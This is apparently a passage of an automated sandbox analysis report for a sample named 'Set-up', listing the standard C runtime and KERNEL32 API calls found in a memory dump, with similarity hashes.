                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,?,6BB9DB65,?,?,?,?,?,6BB9D133,?,00000000), ref: 6BB9D9A5
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6BB9DB65,?,?,?,?,?,6BB9D133,?,00000000), ref: 6BB9D9AD
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,?,6BB9DB65,?,?,?,?,?,6BB9D133,?,00000000), ref: 6BB9D9C4
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BB9D9E7
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6BB9DA01
                                                                                              • _memset.LIBCMT(?,00000000,?,6BB9DB65,?,?,?,?,?,6BB9D133,?,00000000), ref: 6BB9DA17
                                                                                              • _memset.LIBCMT(?,00000000,?,00000000), ref: 6BB9DA30
                                                                                              • _memset.LIBCMT(?,00000000,?,?,00000000,?,00000000), ref: 6BB9DA41
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              APIs
                                                                                              • __doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB6C0FC
                                                                                              • __doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD25
                                                                                              • _errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD2D
                                                                                              • _errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD43
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD4E
                                                                                              • __doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD55
                                                                                              • _errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD5D
                                                                                              • _errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD6A
                                                                                              • __doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD75
                                                                                                • Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA
                                                                                                • Part of subcall function 6BB6BF22: ReadFile.KERNEL32(?,00000040,?,?,00000000,?,?,?), ref: 6BB6BFE8
                                                                                              Similarity
                                                                                              • API ID: __doserrno_errno$CriticalEnterFileReadSection_invalid_parameter_noinfo
                                                                                              APIs
                                                                                              • InterlockedFlushSList.KERNEL32(?,?,?,6BB9F44A), ref: 6BB9FAEB
                                                                                              • ??3@YAXPAX@Z.MSVCR100(-00000004,?,?,6BB9F44A), ref: 6BB9FAF7
                                                                                              • InterlockedFlushSList.KERNEL32(?,?,?,6BB9F44A), ref: 6BB9FB05
                                                                                              • ??3@YAXPAX@Z.MSVCR100(-00000004,?,?,6BB9F44A), ref: 6BB9FB11
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,?,6BB9F44A), ref: 6BB9FB26
                                                                                              • ??3@YAXPAX@Z.MSVCR100(00000000,?,?,6BB9F44A), ref: 6BB9FB43
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6BB9F44A), ref: 6BB9FB54
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,?,?,6BB9F44A), ref: 6BB9FB5A
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,?,?,6BB9F44A), ref: 6BB9FB6A
                                                                                              Similarity
                                                                                              • API ID: ??3@$FlushInterlockedList
                                                                                              APIs
                                                                                              • _malloc_crt.MSVCR100(00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB6AB8B
                                                                                              • _lock.MSVCR100(0000000A,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB6AB9D
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB6ABB4
                                                                                              • __FF_MSGBANNER.LIBCMT ref: 6BB8749F
                                                                                              • __NMSG_WRITE.LIBCMT ref: 6BB874A6
                                                                                              • _errno.MSVCR100(6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB874B9
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin_errno_lock_malloc_crt
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno$__doserrno$AttributesErrorFileLast__dosmaperr_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2636503730-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA61DA
                                                                                              • __ExceptionPtrCopy.LIBCMT(?,00000008,00000014,6BBA58ED,?,?,00000000), ref: 6BBA61F1
                                                                                                • Part of subcall function 6BBABBFB: __EH_prolog3.LIBCMT ref: 6BBABC02
                                                                                                • Part of subcall function 6BBABBFB: _Reset.LIBCMT ref: 6BBABC21
                                                                                              • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(00000008,?,00000008,00000014,6BBA58ED,?,?,00000000), ref: 6BBA61FB
                                                                                                • Part of subcall function 6BBABB8A: shared_ptr.LIBCMT ref: 6BBABB94
                                                                                              • ??3@YAXPAX@Z.MSVCR100(00000008,00000008,?,00000008,00000014,6BBA58ED,?,?,00000000), ref: 6BBA6201
                                                                                              • __uncaught_exception.MSVCR100 ref: 6BBA620D
                                                                                              • __ExceptionPtrCopy.LIBCMT(?,?), ref: 6BBA621E
                                                                                              • ?__ExceptionPtrRethrow@@YAXPBX@Z.MSVCR100(?,?,?), ref: 6BBA622B
                                                                                              • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?,?,?,?), ref: 6BBA6238
                                                                                              • ?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?), ref: 6BBA6248
                                                                                              Similarity
                                                                                              • API ID: Exception$Destroy@@$CopyH_prolog3$??3@ResetRethrow@@__uncaught_exceptionshared_ptr
                                                                                              • String ID:
                                                                                              • API String ID: 1394407404-0
                                                                                              APIs
                                                                                              • _memset.LIBCMT(00000000,00000000,00000090,00000083,00000001,000000BC,?,6BB65B4D,?,00000001,00000000,00000000,00000005), ref: 6BB6549D
                                                                                              • strncpy_s.MSVCR100(00000080,00000010,00000001,0000000F,00000000,00000000,00000005), ref: 6BB72BFB
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _memsetstrncpy_s
                                                                                              • String ID: _.,
                                                                                              • API String ID: 1794348173-2709443920
                                                                                              APIs
                                                                                              • _errno.MSVCR100 ref: 6BB89333
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8933E
                                                                                              • _errno.MSVCR100(?), ref: 6BB8934B
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?), ref: 6BB89356
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: B
                                                                                              • API String ID: 2959964966-1255198513
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: B
                                                                                              • API String ID: 2959964966-1255198513
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: B
                                                                                              • API String ID: 2959964966-1255198513
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: NameName::
                                                                                              • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                              • API String ID: 1333004437-2211150622
                                                                                              APIs
                                                                                              • strncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6BB73C42
                                                                                              • _ismbblead.MSVCR100(00000001), ref: 6BB73C61
                                                                                              • strncpy_s.MSVCR100(?,?,?,?), ref: 6BB73CB5
                                                                                              • strncpy_s.MSVCR100(?,?,?,?), ref: 6BB73CEA
                                                                                              • _errno.MSVCR100 ref: 6BB90F5B
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB90F6A
                                                                                              Similarity
                                                                                              • API ID: strncpy_s$_errno_invalid_parameter_noinfo_ismbblead
                                                                                              • String ID:
                                                                                              • API String ID: 519590025-0
                                                                                              APIs
                                                                                              • __expandlocale.LIBCMT ref: 6BB64E34
                                                                                                • Part of subcall function 6BB64CF9: _getptd.MSVCR100(00000000,00000000,00000005), ref: 6BB64D2F
                                                                                                • Part of subcall function 6BB64CF9: strcpy_s.MSVCR100(00000000,00000000,6BB64DD8,00000000,00000000,00000005), ref: 6BB64D9D
                                                                                              • strcmp.MSVCR100(?,00000048,?,?,?,00000001,00000000,00000000), ref: 6BB64E50
                                                                                              • _strpbrk.LIBCMT(00000005,6BB73008,00000001,00000000,00000000), ref: 6BB72FCD
                                                                                              • strncmp.MSVCR100(6BB64AD4,00000005,00000000,00000001,00000000,00000000), ref: 6BB7300F
                                                                                              • _strlen.LIBCMT(6BB64AD4,00000001,00000000,00000000), ref: 6BB73036
                                                                                              • _strcspn.LIBCMT(00000001,6BB6498C,00000001,00000000,00000000), ref: 6BB7304B
                                                                                              • strncpy_s.MSVCR100(?,00000083,00000001,00000000,00000001,00000000,00000000), ref: 6BB73075
                                                                                              Similarity
                                                                                              • API ID: __expandlocale_getptd_strcspn_strlen_strpbrkstrcmpstrcpy_sstrncmpstrncpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 1101789701-0
                                                                                              APIs
                                                                                              • _errno.MSVCR100(?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFDD5
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFDE0
                                                                                                • Part of subcall function 6BBDAEAE: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6BBAB84F,?,6BBAC3D3,00000003,6BB874A4,6BB6AA18,0000000C,6BB874F7,00000001,00000001), ref: 6BBDAEB5
                                                                                              • _errno.MSVCR100(00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFE01
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFE0C
                                                                                              • __stricmp_l.LIBCMT(00000001,00000000,?,00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFE36
                                                                                                • Part of subcall function 6BBD0E0D: _errno.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6BBD0E28
                                                                                                • Part of subcall function 6BBD0E0D: _invalid_parameter_noinfo.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6BBD0E33
                                                                                              • __crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6BC06CD0,00000002,?,00000001,?,?,00000000,?,?,?,00000000), ref: 6BBBFE8C
                                                                                              • __crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6BC06CD0,00000002,?,00000001,?,?,?,?,?,?,?), ref: 6BBBFF0D
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,?,00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFF6A
                                                                                              APIs
                                                                                              • _errno.MSVCR100(?,?,6BB642B4,?), ref: 6BB8875A
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,6BB642B4,?), ref: 6BB88765
                                                                                              APIs
                                                                                              • _fileno.MSVCR100(?,?,?,?,?,6BB73379,?), ref: 6BB6CE8D
                                                                                              • _read.MSVCR100(00000000,?,?,?,?,6BB73379,?), ref: 6BB6CE94
                                                                                              • _fileno.MSVCR100(?), ref: 6BB6CEB7
                                                                                              • _fileno.MSVCR100(?), ref: 6BB6CEC7
                                                                                              • _fileno.MSVCR100(?), ref: 6BB6CED8
                                                                                              • _fileno.MSVCR100(?,?), ref: 6BB6CEE8
                                                                                              • _errno.MSVCR100(?,?,6BB73379,?), ref: 6BB8870C
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,6BB73379,?), ref: 6BB88717
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002), ref: 6BB76D8E
                                                                                              • _get_osfhandle.MSVCR100(?,00000000), ref: 6BB76D98
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 6BB76D9F
                                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 6BB76DA6
                                                                                                • Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?,?,?,?,6BB6A865,?,6BB6A880,00000010), ref: 6BB6A795
                                                                                                • Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?), ref: 6BB6A7B8
                                                                                                • Part of subcall function 6BB6A78A: CloseHandle.KERNEL32(00000000), ref: 6BB6A7BF
                                                                                              • _errno.MSVCR100 ref: 6BB90539
                                                                                              • __doserrno.MSVCR100 ref: 6BB90544
                                                                                              APIs
                                                                                              • __crtCompareStringW.MSVCR100(?,00001001,00000000,?,?,?,?), ref: 6BB75F76
                                                                                              • _errno.MSVCR100 ref: 6BB8C752
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C75D
                                                                                              • _errno.MSVCR100 ref: 6BB8C76C
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C777
                                                                                              • _errno.MSVCR100 ref: 6BB8C786
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C791
                                                                                              APIs
                                                                                              • _getptd.MSVCR100(?,?,?,?,?,?,?,6BB64CC0,00000014), ref: 6BB64BAF
                                                                                                • Part of subcall function 6BB64E90: _getptd.MSVCR100(6BB64EF0,0000000C,6BB89FD5,?,?,6BB69233,?), ref: 6BB64E9C
                                                                                                • Part of subcall function 6BB64E90: _lock.MSVCR100(0000000C), ref: 6BB64EB3
                                                                                              • _calloc_crt.MSVCR100(000000D8,00000001), ref: 6BB64BCF
                                                                                              • _lock.MSVCR100(0000000C), ref: 6BB64BE5
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • __copytlocinfo_nolock.LIBCMT ref: 6BB64BF3
                                                                                                • Part of subcall function 6BB6497A: _unlock.MSVCR100(0000000C,6BB64C01), ref: 6BB6497C
                                                                                                • Part of subcall function 6BB64DDA: __expandlocale.LIBCMT ref: 6BB64E34
                                                                                                • Part of subcall function 6BB64DDA: strcmp.MSVCR100(?,00000048,?,?,?,00000001,00000000,00000000), ref: 6BB64E50
                                                                                              • strcmp.MSVCR100(00000000,6BC039A0), ref: 6BB64C28
                                                                                              • _lock.MSVCR100(0000000C), ref: 6BB64C39
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,?,6BB64CC0,00000014), ref: 6BB90C98
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,6BB64CC0,00000014), ref: 6BB90CA3
                                                                                              APIs
                                                                                              • _strlen.LIBCMT(00000000,?,?,6BB6B286), ref: 6BB6B2C5
                                                                                              • _calloc_crt.MSVCR100(00000001,00000004,?,?,6BB6B286), ref: 6BB6B2D5
                                                                                              • _strlen.LIBCMT(00000000,?,?,?,6BB6B286), ref: 6BB6B2FC
                                                                                              • _calloc_crt.MSVCR100(00000001,00000001,?,?,?,6BB6B286), ref: 6BB6B30D
                                                                                              • strcpy_s.MSVCR100(00000000,00000001,00000000,?,?,?,6BB6B286), ref: 6BB6B321
                                                                                              • free.MSVCR100(?,?,?,6BB6B286), ref: 6BB6B33E
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT(00000000,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71107
                                                                                              • _calloc_crt.MSVCR100(00000001,00000004,?,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71118
                                                                                              • _wcslen.LIBCMT(00000000,?,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB7113C
                                                                                              • _calloc_crt.MSVCR100(00000001,00000002,?,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB7114E
                                                                                              • wcscpy_s.MSVCR100(00000000,00000001,00000000,?,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71162
                                                                                              • free.MSVCR100(?,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71180
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _calloc_crt_wcslen$freewcscpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 968141106-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9F17B
                                                                                              • GetTickCount.KERNEL32 ref: 6BB9F18B
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064), ref: 6BB9F1AB
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6BB9F1B7
                                                                                              • GetTickCount.KERNEL32 ref: 6BB9F1E8
                                                                                              • GetTickCount.KERNEL32 ref: 6BB9F1F2
                                                                                              • GetTickCount.KERNEL32 ref: 6BB9F21D
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BB9F251
                                                                                              Similarity
                                                                                              • API ID: CountTick$CriticalSection$EnterH_prolog3LeaveObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 2258694387-0
                                                                                              APIs
                                                                                              • DecodePointer.KERNEL32(6BC07580,6BB6BD3C,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAA1
                                                                                              • DecodePointer.KERNEL32(?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAAE
                                                                                              • _msize.MSVCR100(00000000,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AACB
                                                                                                • Part of subcall function 6BB62231: HeapSize.KERNEL32(00000000,00000000,?,6BB6AAD0,00000000,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC), ref: 6BB6224B
                                                                                              • EncodePointer.KERNEL32(?,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAE7
                                                                                              • EncodePointer.KERNEL32(-00000004,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAEF
                                                                                              • _realloc_crt.MSVCR100(00000000,00000800,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB72BAF
                                                                                              • EncodePointer.KERNEL32(00000000,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB72BC5
                                                                                              Similarity
                                                                                              • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 765448609-0
                                                                                              APIs
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB6234D
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB623B8
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB623C8
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB6933E
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB69347
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB6934F
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB69357
                                                                                              Similarity
                                                                                              • API ID: DecrementInterlocked
                                                                                              • String ID:
                                                                                              • API String ID: 3448037634-0
                                                                                              APIs
                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 6BB61F25
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB61F90
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB61F9E
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB62ABC
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB62AC4
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB62ACC
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB62AD4
                                                                                              Similarity
                                                                                              • API ID: IncrementInterlocked
                                                                                              • String ID:
                                                                                              • API String ID: 3508698243-0
                                                                                              APIs
                                                                                              • _errno.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD8678
                                                                                              • _errno.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD8697
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD86A2
                                                                                              • _get_osfhandle.MSVCR100(?,6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD86DE
                                                                                              • FlushFileBuffers.KERNEL32(00000000,6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD86E5
                                                                                              • GetLastError.KERNEL32(?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD86EF
                                                                                              • __doserrno.MSVCR100(?,?,?,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD8704
                                                                                              • _errno.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD870E
                                                                                              Similarity
                                                                                              • API ID: _errno$BuffersErrorFileFlushLast__doserrno_get_osfhandle_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3018510309-0
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(6BB53238,?,6BB607BA,6BBF7F62), ref: 6BB6069C
                                                                                              • __set_flsgetvalue.MSVCR100 ref: 6BB606AA
                                                                                                • Part of subcall function 6BB6067B: TlsGetValue.KERNEL32(?,6BB606AF), ref: 6BB60684
                                                                                              • SetLastError.KERNEL32(00000000), ref: 6BB606BC
                                                                                              • _calloc_crt.MSVCR100(00000001,00000214), ref: 6BB875B7
                                                                                              • DecodePointer.KERNEL32(00000000), ref: 6BB875D5
                                                                                              • _initptd.MSVCR100(00000000,00000000), ref: 6BB875E4
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB875EB
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CurrentDecodePointerThreadValue__set_flsgetvalue_calloc_crt_initptd
                                                                                              • String ID:
                                                                                              • API String ID: 242762301-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno$_fileno_invalid_parameter_noinfo_lseek
                                                                                              • String ID:
                                                                                              • API String ID: 1667283477-0
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Name::operator=operator+
                                                                                              • String ID: std::nullptr_t$volatile
                                                                                              • API String ID: 1352385710-3726895890
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(?,?,00000000,00000001), ref: 6BB6B149
                                                                                              • ___crtGetStringTypeA.LIBCMT ref: 6BB6B19A
                                                                                              • __crtLCMapStringA.MSVCR100(00000000,?,00000100,00000020,00000100,?,00000100,?,00000000,00000000,00000001,00000020,00000100,?,?,?), ref: 6BB6B1BA
                                                                                              • __crtLCMapStringA.MSVCR100(00000000,?,00000200,00000020,00000100,?,00000100,?,00000000), ref: 6BB6B1DF
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: String$__crt$InfoType___crt
                                                                                              • String ID:
                                                                                              • API String ID: 3423027535-3916222277
                                                                                              • Opcode ID: f525d857bafda9b3c3383fb1f65d5ec79fc41996fca746deb42a167cd7a821e8
                                                                                              • Instruction ID: 65d76fe3d385f4a8331b42532570d587e82cd6622ce58921cec4638c49830cfd
                                                                                              • Opcode Fuzzy Hash: f525d857bafda9b3c3383fb1f65d5ec79fc41996fca746deb42a167cd7a821e8
                                                                                              • Instruction Fuzzy Hash: F44104705047DC9EDB318F648C85BEB7BF8EB05748F1444E8EA9A86182E2799B458F20
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT(00000000,00000000,00000000,00000000,?,6BB773CA,00000000,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000,01331910), ref: 6BB71E57
                                                                                              • calloc.MSVCR100(00000001,00000002,00000000,00000000,00000000,00000000,?,6BB773CA,00000000,00000000,00000000,0000003D,?,6BB773E6,74DEDF80,00000000), ref: 6BB71E62
                                                                                              • wcscpy_s.MSVCR100(00000000,00000001,00000000,74DEDF80,00000000,01331910), ref: 6BB71E75
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,01331910), ref: 6BB89799
                                                                                              • _errno.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,01331910), ref: 6BB897B0
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,74DEDF80,00000000,01331910), ref: 6BB897BA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __invoke_watson_errno_invalid_parameter_noinfo_wcslencallocwcscpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 2624155197-0
                                                                                              • Opcode ID: f465bf2f3a54c0ef8722b592f7bec246283face6e911eaf62ac90378db1aa1ce
                                                                                              • Instruction ID: 07c0e263bcf10991ecf81fcde2f808e7886a56ea4164b88877b2f71486301ca4
                                                                                              • Opcode Fuzzy Hash: f465bf2f3a54c0ef8722b592f7bec246283face6e911eaf62ac90378db1aa1ce
                                                                                              • Instruction Fuzzy Hash: F6317C3A6247D196DB212E798C8136B33B0EFC1B64B9055BAF9758B641F73DC840C390
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BB98813
                                                                                              • GetCurrentThread.KERNEL32 ref: 6BB9885E
                                                                                                • Part of subcall function 6BB9B795: _memset.LIBCMT(?,00000000,0000000C), ref: 6BB9B7A0
                                                                                                • Part of subcall function 6BB9B795: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B7A8
                                                                                                • Part of subcall function 6BB9B795: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB9B7B2
                                                                                                • Part of subcall function 6BB9B795: GetCurrentProcess.KERNEL32(?,?), ref: 6BB9B7C4
                                                                                                • Part of subcall function 6BB9B795: GetProcessAffinityMask.KERNEL32(00000000), ref: 6BB9B7CB
                                                                                              • _memset.LIBCMT(00000000,00000000,0000000C,?,6BBA2BA8,00000000,?,?,?,?,00000000,00000000), ref: 6BB98899
                                                                                                • Part of subcall function 6BB9B7F5: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100(?,?,6BB9899B,00000000,?,?), ref: 6BB9B7FB
                                                                                                • Part of subcall function 6BB9B7F5: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100(?,?,6BB9899B,00000000,?,?), ref: 6BB9B805
                                                                                                • Part of subcall function 6BB9B7F5: SetThreadAffinityMask.KERNEL32(?,?), ref: 6BB9B814
                                                                                                • Part of subcall function 6BBA314F: SetEvent.KERNEL32(?), ref: 6BBA3192
